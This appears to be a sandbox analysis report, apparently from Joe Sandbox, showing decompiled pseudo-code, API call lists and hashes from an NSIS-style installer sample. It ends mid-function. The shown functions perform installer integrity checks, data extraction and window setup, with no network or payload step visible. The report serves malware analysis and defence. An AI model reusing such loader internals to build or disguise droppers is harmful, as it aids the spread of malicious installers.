                                                                                      					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
                                                                                      					__eflags =  *0x42d268;
                                                                                      					if(__eflags == 0) {
                                                                                      						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
                                                                                      					}
                                                                                      					lstrcatW(L"1033", _t76);
                                                                                      				} else {
                                                                                      					E00406484(L"1033",  *_t22() & 0x0000ffff);
                                                                                      				}
                                                                                      				E00403EC2(_t78, _t90);
                                                                                      				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp";
                                                                                      				 *0x434f80 =  *0x434f18 & 0x00000020;
                                                                                      				 *0x434f9c = 0x10000;
                                                                                      				if(E00405F14(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp") != 0) {
                                                                                      					L16:
                                                                                      					if(E00405F14(_t98, _t86) == 0) {
                                                                                      						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                                                                      					}
                                                                                      					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                      					 *0x433ee8 = _t30;
                                                                                      					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                                      						L21:
                                                                                      						if(E0040140B(0) == 0) {
                                                                                      							_t32 = E00403EC2(_t78, __eflags);
                                                                                      							__eflags =  *0x434fa0;
                                                                                      							if( *0x434fa0 != 0) {
                                                                                      								_t33 = E00405672(_t32, 0);
                                                                                      								__eflags = _t33;
                                                                                      								if(_t33 == 0) {
                                                                                      									E0040140B(1);
                                                                                      									goto L33;
                                                                                      								}
                                                                                      								__eflags =  *0x433ecc;
                                                                                      								if( *0x433ecc == 0) {
                                                                                      									E0040140B(2);
                                                                                      								}
                                                                                      								goto L22;
                                                                                      							}
                                                                                      							ShowWindow( *0x42d248, 5); // executed
                                                                                      							_t39 = E0040689A("RichEd20"); // executed
                                                                                      							__eflags = _t39;
                                                                                      							if(_t39 == 0) {
                                                                                      								E0040689A("RichEd32");
                                                                                      							}
                                                                                      							_t87 = L"RichEdit20W";
                                                                                      							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
                                                                                      							__eflags = _t40;
                                                                                      							if(_t40 == 0) {
                                                                                      								GetClassInfoW(0, L"RichEdit", 0x433ea0);
                                                                                      								 *0x433ec4 = _t87;
                                                                                      								RegisterClassW(0x433ea0);
                                                                                      							}
                                                                                      							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
                                                                                      							E00403B3C(E0040140B(5), 1);
                                                                                      							return _t44;
                                                                                      						}
                                                                                      						L22:
                                                                                      						_t36 = 2;
                                                                                      						return _t36;
                                                                                      					} else {
                                                                                      						_t78 =  *0x434f00;
                                                                                      						 *0x433ea4 = E00401000;
                                                                                      						 *0x433eb0 =  *0x434f00;
                                                                                      						 *0x433eb4 = _t30;
                                                                                      						 *0x433ec4 = 0x40a380;
                                                                                      						if(RegisterClassW(0x433ea0) == 0) {
                                                                                      							L33:
                                                                                      							__eflags = 0;
                                                                                      							return 0;
                                                                                      						}
                                                                                      						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                                      						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
                                                                                      						goto L21;
                                                                                      					}
                                                                                      				} else {
                                                                                      					_t78 =  *(_t82 + 0x48);
                                                                                      					_t92 = _t78;
                                                                                      					if(_t78 == 0) {
                                                                                      						goto L16;
                                                                                      					}
                                                                                      					_t76 = 0x432ea0;
                                                                                      					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
                                                                                      					_t63 =  *0x432ea0; // 0x43
                                                                                      					if(_t63 == 0) {
                                                                                      						goto L16;
                                                                                      					}
                                                                                      					if(_t63 == 0x22) {
                                                                                      						_t76 = 0x432ea2;
                                                                                      						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
                                                                                      					}
                                                                                      					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                                      					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                                      						L15:
                                                                                      						E0040653D(_t86, E00405E0C(_t76));
                                                                                      						goto L16;
                                                                                      					} else {
                                                                                      						_t69 = GetFileAttributesW(_t76);
                                                                                      						if(_t69 == 0xffffffff) {
                                                                                      							L14:
                                                                                      							E00405E58(_t76);
                                                                                      							goto L15;
                                                                                      						}
                                                                                      						_t98 = _t69 & 0x00000010;
                                                                                      						if((_t69 & 0x00000010) != 0) {
                                                                                      							goto L15;
                                                                                      						}
                                                                                      						goto L14;
                                                                                      					}
                                                                                      				}
                                                                                      			}

























                                                                                      APIs
                                                                                        • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                        • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                      • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75A43420), ref: 00403CED
                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                                      • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D54
                                                                                        • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                      • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                                                                      • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                                                                      • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                                                                      • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                      • API String ID: 1975747703-1862882193
                                                                                      • Opcode ID: 3f3578f5c36ca085bc464682e588f9d41497884baa4372cf005748276afb9df9
                                                                                      • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                                      • Opcode Fuzzy Hash: 3f3578f5c36ca085bc464682e588f9d41497884baa4372cf005748276afb9df9
                                                                                      • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 80%
                                                                                      			E0040307D(void* __eflags, signed int _a4) {
                                                                                      				DWORD* _v8;
                                                                                      				DWORD* _v12;
                                                                                      				void* _v16;
                                                                                      				intOrPtr _v20;
                                                                                      				char _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				intOrPtr _v36;
                                                                                      				intOrPtr _v40;
                                                                                      				signed int _v44;
                                                                                      				long _t43;
                                                                                      				signed int _t50;
                                                                                      				void* _t53;
                                                                                      				void* _t57;
                                                                                      				intOrPtr* _t59;
                                                                                      				long _t60;
                                                                                      				signed int _t65;
                                                                                      				signed int _t70;
                                                                                      				signed int _t71;
                                                                                      				signed int _t77;
                                                                                      				intOrPtr _t80;
                                                                                      				long _t82;
                                                                                      				signed int _t85;
                                                                                      				signed int _t87;
                                                                                      				void* _t89;
                                                                                      				signed int _t90;
                                                                                      				signed int _t93;
                                                                                      				void* _t94;
                                                                                      
                                                                                      				_t82 = 0;
                                                                                      				_v12 = 0;
                                                                                      				_v8 = 0;
                                                                                      				_t43 = GetTickCount();
                                                                                      				_t91 = L"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe";
                                                                                      				 *0x434f0c = _t43 + 0x3e8;
                                                                                      				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe", 0x400);
                                                                                      				_t89 = E0040602D(_t91, 0x80000000, 3);
                                                                                      				_v16 = _t89;
                                                                                      				 *0x40a018 = _t89;
                                                                                      				if(_t89 == 0xffffffff) {
                                                                                      					return L"Error launching installer";
                                                                                      				}
                                                                                      				E0040653D(0x441800, _t91);
                                                                                      				E0040653D(0x444000, E00405E58(0x441800));
                                                                                      				_t50 = GetFileSize(_t89, 0);
                                                                                      				__eflags = _t50;
                                                                                      				 *0x42aa24 = _t50;
                                                                                      				_t93 = _t50;
                                                                                      				if(_t50 <= 0) {
                                                                                      					L24:
                                                                                      					E00403019(1);
                                                                                      					__eflags =  *0x434f14 - _t82;
                                                                                      					if( *0x434f14 == _t82) {
                                                                                      						goto L29;
                                                                                      					}
                                                                                      					__eflags = _v8 - _t82;
                                                                                      					if(_v8 == _t82) {
                                                                                      						L28:
                                                                                      						_t34 =  &_v24; // 0x40387d
                                                                                      						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                                                                                      						_t94 = _t53;
                                                                                      						E004034E5( *0x434f14 + 0x1c);
                                                                                      						_t35 =  &_v24; // 0x40387d
                                                                                      						_push( *_t35);
                                                                                      						_push(_t94);
                                                                                      						_push(_t82);
                                                                                      						_push(0xffffffff); // executed
                                                                                      						_t57 = E004032B4(); // executed
                                                                                      						__eflags = _t57 - _v24;
                                                                                      						if(_t57 == _v24) {
                                                                                      							__eflags = _v44 & 0x00000001;
                                                                                      							 *0x434f10 = _t94;
                                                                                      							 *0x434f18 =  *_t94;
                                                                                      							if((_v44 & 0x00000001) != 0) {
                                                                                      								 *0x434f1c =  *0x434f1c + 1;
                                                                                      								__eflags =  *0x434f1c;
                                                                                      							}
                                                                                      							_t40 = _t94 + 0x44; // 0x44
                                                                                      							_t59 = _t40;
                                                                                      							_t85 = 8;
                                                                                      							do {
                                                                                      								_t59 = _t59 - 8;
                                                                                      								 *_t59 =  *_t59 + _t94;
                                                                                      								_t85 = _t85 - 1;
                                                                                      								__eflags = _t85;
                                                                                      							} while (_t85 != 0);
                                                                                      							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                                      							 *(_t94 + 0x3c) = _t60;
                                                                                      							E00405FE8(0x434f20, _t94 + 4, 0x40);
                                                                                      							__eflags = 0;
                                                                                      							return 0;
                                                                                      						}
                                                                                      						goto L29;
                                                                                      					}
                                                                                      					E004034E5( *0x41ea18);
                                                                                      					_t65 = E004034CF( &_a4, 4);
                                                                                      					__eflags = _t65;
                                                                                      					if(_t65 == 0) {
                                                                                      						goto L29;
                                                                                      					}
                                                                                      					__eflags = _v12 - _a4;
                                                                                      					if(_v12 != _a4) {
                                                                                      						goto L29;
                                                                                      					}
                                                                                      					goto L28;
                                                                                      				} else {
                                                                                      					do {
                                                                                      						_t90 = _t93;
                                                                                      						asm("sbb eax, eax");
                                                                                      						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
                                                                                      						__eflags = _t93 - _t70;
                                                                                      						if(_t93 >= _t70) {
                                                                                      							_t90 = _t70;
                                                                                      						}
                                                                                      						_t71 = E004034CF(0x416a18, _t90);
                                                                                      						__eflags = _t71;
                                                                                      						if(_t71 == 0) {
                                                                                      							E00403019(1);
                                                                                      							L29:
                                                                                      							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                      						}
                                                                                      						__eflags =  *0x434f14;
                                                                                      						if( *0x434f14 != 0) {
                                                                                      							__eflags = _a4 & 0x00000002;
                                                                                      							if((_a4 & 0x00000002) == 0) {
                                                                                      								E00403019(0);
                                                                                      							}
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						E00405FE8( &_v44, 0x416a18, 0x1c);
                                                                                      						_t77 = _v44;
                                                                                      						__eflags = _t77 & 0xfffffff0;
                                                                                      						if((_t77 & 0xfffffff0) != 0) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _v40 - 0xdeadbeef;
                                                                                      						if(_v40 != 0xdeadbeef) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _v28 - 0x74736e49;
                                                                                      						if(_v28 != 0x74736e49) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _v32 - 0x74666f73;
                                                                                      						if(_v32 != 0x74666f73) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _v36 - 0x6c6c754e;
                                                                                      						if(_v36 != 0x6c6c754e) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						_a4 = _a4 | _t77;
                                                                                      						_t87 =  *0x41ea18; // 0x4ad42
                                                                                      						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                                                                                      						_t80 = _v20;
                                                                                      						__eflags = _t80 - _t93;
                                                                                      						 *0x434f14 = _t87;
                                                                                      						if(_t80 > _t93) {
                                                                                      							goto L29;
                                                                                      						}
                                                                                      						__eflags = _a4 & 0x00000008;
                                                                                      						if((_a4 & 0x00000008) != 0) {
                                                                                      							L16:
                                                                                      							_v8 = _v8 + 1;
                                                                                      							_t93 = _t80 - 4;
                                                                                      							__eflags = _t90 - _t93;
                                                                                      							if(_t90 > _t93) {
                                                                                      								_t90 = _t93;
                                                                                      							}
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _a4 & 0x00000004;
                                                                                      						if((_a4 & 0x00000004) != 0) {
                                                                                      							break;
                                                                                      						}
                                                                                      						goto L16;
                                                                                      						L20:
                                                                                      						__eflags = _t93 -  *0x42aa24; // 0x4ad46
                                                                                      						if(__eflags < 0) {
                                                                                      							_v12 = E004069F7(_v12, 0x416a18, _t90);
                                                                                      						}
                                                                                      						 *0x41ea18 =  *0x41ea18 + _t90;
                                                                                      						_t93 = _t93 - _t90;
                                                                                      						__eflags = _t93;
                                                                                      					} while (_t93 != 0);
                                                                                      					_t82 = 0;
                                                                                      					__eflags = 0;
                                                                                      					goto L24;
                                                                                      				}
                                                                                      			}































                                                                                      0x00403141
                                                                                      0x004031bd
                                                                                      0x004031c1
                                                                                      0x004031c5
                                                                                      0x004031ca
                                                                                      0x00000000
                                                                                      0x004031c1
                                                                                      0x0040314a
                                                                                      0x0040314f
                                                                                      0x00403152
                                                                                      0x00403157
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403159
                                                                                      0x00403160
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403162
                                                                                      0x00403169
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040316b
                                                                                      0x00403172
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403174
                                                                                      0x0040317b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040317d
                                                                                      0x00403183
                                                                                      0x0040318c
                                                                                      0x00403192
                                                                                      0x00403195
                                                                                      0x00403197
                                                                                      0x0040319d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004031a3
                                                                                      0x004031a7
                                                                                      0x004031af
                                                                                      0x004031af
                                                                                      0x004031b2
                                                                                      0x004031b5
                                                                                      0x004031b7
                                                                                      0x004031b9
                                                                                      0x004031b9
                                                                                      0x00000000
                                                                                      0x004031b7
                                                                                      0x004031a9
                                                                                      0x004031ad
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004031cb
                                                                                      0x004031cb
                                                                                      0x004031d1
                                                                                      0x004031dd
                                                                                      0x004031dd
                                                                                      0x004031e0
                                                                                      0x004031e6
                                                                                      0x004031e6
                                                                                      0x004031e6
                                                                                      0x004031ee
                                                                                      0x004031ee
                                                                                      0x00000000
                                                                                      0x004031ee

                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 0040308E
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\xcVh7ZmH4Y.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                                        • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\xcVh7ZmH4Y.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                        • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,C:\Users\user\Desktop\xcVh7ZmH4Y.exe,C:\Users\user\Desktop\xcVh7ZmH4Y.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                                      • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\xcVh7ZmH4Y.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                                      • API String ID: 2803837635-1045513272
                                                                                      • Opcode ID: 37209e3e5def914a9800fbc428d55447136e102254459de3f9cb7006d4f45717
                                                                                      • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                                      • Opcode Fuzzy Hash: 37209e3e5def914a9800fbc428d55447136e102254459de3f9cb7006d4f45717
                                                                                      • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      [Control-flow graph for function E004032B4 (entry 0x004032B4); graph image not reproduced]
                                                                                      C-Code - Quality: 95%
                                                                                      			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                                                      				signed int _v8;
                                                                                      				int _v12;
                                                                                      				intOrPtr _v16;
                                                                                      				long _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				short _v152;
                                                                                      				void* _t65;
                                                                                      				long _t70;
                                                                                      				intOrPtr _t75;
                                                                                      				long _t76;
                                                                                      				void* _t78;
                                                                                      				int _t88;
                                                                                      				intOrPtr _t92;
                                                                                      				intOrPtr _t95;
                                                                                      				long _t96;
                                                                                      				signed int _t97;
                                                                                      				int _t98;
                                                                                      				int _t99;
                                                                                      				void* _t101;
                                                                                      				void* _t102;
                                                                                      
                                                                                      				_t97 = _a16;
                                                                                      				_t92 = _a12;
                                                                                      				_v12 = _t97;
                                                                                      				if(_t92 == 0) {
                                                                                      					_v12 = 0x8000;
                                                                                      				}
                                                                                      				_v8 = _v8 & 0x00000000;
                                                                                      				_v16 = _t92;
                                                                                      				if(_t92 == 0) {
                                                                                      					_v16 = 0x422a20;
                                                                                      				}
                                                                                      				_t62 = _a4;
                                                                                      				if(_a4 >= 0) {
                                                                                      					E004034E5( *0x434f58 + _t62);
                                                                                      				}
                                                                                      				if(E004034CF( &_a16, 4) == 0) {
                                                                                      					L41:
                                                                                      					_push(0xfffffffd);
                                                                                      					goto L42;
                                                                                      				} else {
                                                                                      					if((_a19 & 0x00000080) == 0) {
                                                                                      						if(_t92 != 0) {
                                                                                      							if(_a16 < _t97) {
                                                                                      								_t97 = _a16;
                                                                                      							}
                                                                                      							if(E004034CF(_t92, _t97) != 0) {
                                                                                      								_v8 = _t97;
                                                                                      								L44:
                                                                                      								return _v8;
                                                                                      							} else {
                                                                                      								goto L41;
                                                                                      							}
                                                                                      						}
                                                                                      						if(_a16 <= _t92) {
                                                                                      							goto L44;
                                                                                      						}
                                                                                      						_t88 = _v12;
                                                                                      						while(1) {
                                                                                      							_t98 = _a16;
                                                                                      							if(_a16 >= _t88) {
                                                                                      								_t98 = _t88;
                                                                                      							}
                                                                                      							if(E004034CF(0x41ea20, _t98) == 0) {
                                                                                      								goto L41;
                                                                                      							}
                                                                                      							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
                                                                                      								L28:
                                                                                      								_push(0xfffffffe);
                                                                                      								L42:
                                                                                      								_pop(_t65);
                                                                                      								return _t65;
                                                                                      							}
                                                                                      							_v8 = _v8 + _t98;
                                                                                      							_a16 = _a16 - _t98;
                                                                                      							if(_a16 > 0) {
                                                                                      								continue;
                                                                                      							}
                                                                                      							goto L44;
                                                                                      						}
                                                                                      						goto L41;
                                                                                      					}
                                                                                      					_t70 = GetTickCount();
                                                                                      					 *0x40d384 =  *0x40d384 & 0x00000000;
                                                                                      					 *0x40d380 =  *0x40d380 & 0x00000000;
                                                                                      					_t14 =  &_a16;
                                                                                      					 *_t14 = _a16 & 0x7fffffff;
                                                                                      					_v20 = _t70;
                                                                                      					 *0x40ce68 = 8;
                                                                                      					 *0x416a10 = 0x40ea08;
                                                                                      					 *0x416a0c = 0x40ea08;
                                                                                      					 *0x416a08 = 0x416a08;
                                                                                      					_a4 = _a16;
                                                                                      					if( *_t14 <= 0) {
                                                                                      						goto L44;
                                                                                      					} else {
                                                                                      						goto L9;
                                                                                      					}
                                                                                      					while(1) {
                                                                                      						L9:
                                                                                      						_t99 = 0x4000;
                                                                                      						if(_a16 < 0x4000) {
                                                                                      							_t99 = _a16;
                                                                                      						}
                                                                                      						if(E004034CF(0x41ea20, _t99) == 0) {
                                                                                      							goto L41;
                                                                                      						}
                                                                                      						_a16 = _a16 - _t99;
                                                                                      						 *0x40ce58 = 0x41ea20;
                                                                                      						 *0x40ce5c = _t99;
                                                                                      						while(1) {
                                                                                      							_t95 = _v16;
                                                                                      							 *0x40ce60 = _t95;
                                                                                      							 *0x40ce64 = _v12;
                                                                                      							_t75 = E00406A65(0x40ce58);
                                                                                      							_v24 = _t75;
                                                                                      							if(_t75 < 0) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_t101 =  *0x40ce60 - _t95;
                                                                                      							_t76 = GetTickCount();
                                                                                      							_t96 = _t76;
                                                                                      							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                                                      								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                                      								_t102 = _t102 + 0xc;
                                                                                      								E0040559F(0,  &_v152); // executed
                                                                                      								_v20 = _t96;
                                                                                      							}
                                                                                      							if(_t101 == 0) {
                                                                                      								if(_a16 > 0) {
                                                                                      									goto L9;
                                                                                      								}
                                                                                      								goto L44;
                                                                                      							} else {
                                                                                      								if(_a12 != 0) {
                                                                                      									_v8 = _v8 + _t101;
                                                                                      									_v12 = _v12 - _t101;
                                                                                      									_v16 =  *0x40ce60;
                                                                                      									L23:
                                                                                      									if(_v24 != 1) {
                                                                                      										continue;
                                                                                      									}
                                                                                      									goto L44;
                                                                                      								}
                                                                                      								_t78 = E004060DF(_a8, _v16, _t101); // executed
                                                                                      								if(_t78 == 0) {
                                                                                      									goto L28;
                                                                                      								}
                                                                                      								_v8 = _v8 + _t101;
                                                                                      								goto L23;
                                                                                      							}
                                                                                      						}
                                                                                      						_push(0xfffffffc);
                                                                                      						goto L42;
                                                                                      					}
                                                                                      					goto L41;
                                                                                      				}
                                                                                      			}
























                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountTick$wsprintf
                                                                                      • String ID: *B$ A$ A$... %d%%$}8@
                                                                                      • API String ID: 551687249-3029848762
                                                                                      • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                      • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                                                      • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                      • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

Control-flow Graph (function 0x40176f; nodes marked Executed / Not Executed)
                                                                                      C-Code - Quality: 75%
                                                                                      			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                                      				void* __esi;
                                                                                      				void* _t35;
                                                                                      				void* _t43;
                                                                                      				void* _t45;
                                                                                      				FILETIME* _t51;
                                                                                      				FILETIME* _t64;
                                                                                      				void* _t66;
                                                                                      				signed int _t72;
                                                                                      				FILETIME* _t73;
                                                                                      				FILETIME* _t77;
                                                                                      				signed int _t79;
                                                                                      				WCHAR* _t81;
                                                                                      				void* _t83;
                                                                                      				void* _t84;
                                                                                      				void* _t86;
                                                                                      
                                                                                      				_t77 = __ebx;
                                                                                      				 *(_t86 - 8) = E00402DA6(0x31);
                                                                                      				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                                                      				_t35 = E00405E83( *(_t86 - 8));
                                                                                      				_push( *(_t86 - 8));
                                                                                      				_t81 = L"Call";
                                                                                      				if(_t35 == 0) {
                                                                                      					lstrcatW(E00405E0C(E0040653D(_t81, 0x441000)), ??);
                                                                                      				} else {
                                                                                      					E0040653D();
                                                                                      				}
                                                                                      				E004067C4(_t81);
                                                                                      				while(1) {
                                                                                      					__eflags =  *(_t86 + 8) - 3;
                                                                                      					if( *(_t86 + 8) >= 3) {
                                                                                      						_t66 = E00406873(_t81);
                                                                                      						_t79 = 0;
                                                                                      						__eflags = _t66 - _t77;
                                                                                      						if(_t66 != _t77) {
                                                                                      							_t73 = _t66 + 0x14;
                                                                                      							__eflags = _t73;
                                                                                      							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                                                      						}
                                                                                      						asm("sbb eax, eax");
                                                                                      						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                                      						__eflags = _t72;
                                                                                      						 *(_t86 + 8) = _t72;
                                                                                      					}
                                                                                      					__eflags =  *(_t86 + 8) - _t77;
                                                                                      					if( *(_t86 + 8) == _t77) {
                                                                                      						E00406008(_t81);
                                                                                      					}
                                                                                      					__eflags =  *(_t86 + 8) - 1;
                                                                                      					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                                      					__eflags = _t43 - 0xffffffff;
                                                                                      					 *(_t86 - 0x38) = _t43;
                                                                                      					if(_t43 != 0xffffffff) {
                                                                                      						break;
                                                                                      					}
                                                                                      					__eflags =  *(_t86 + 8) - _t77;
                                                                                      					if( *(_t86 + 8) != _t77) {
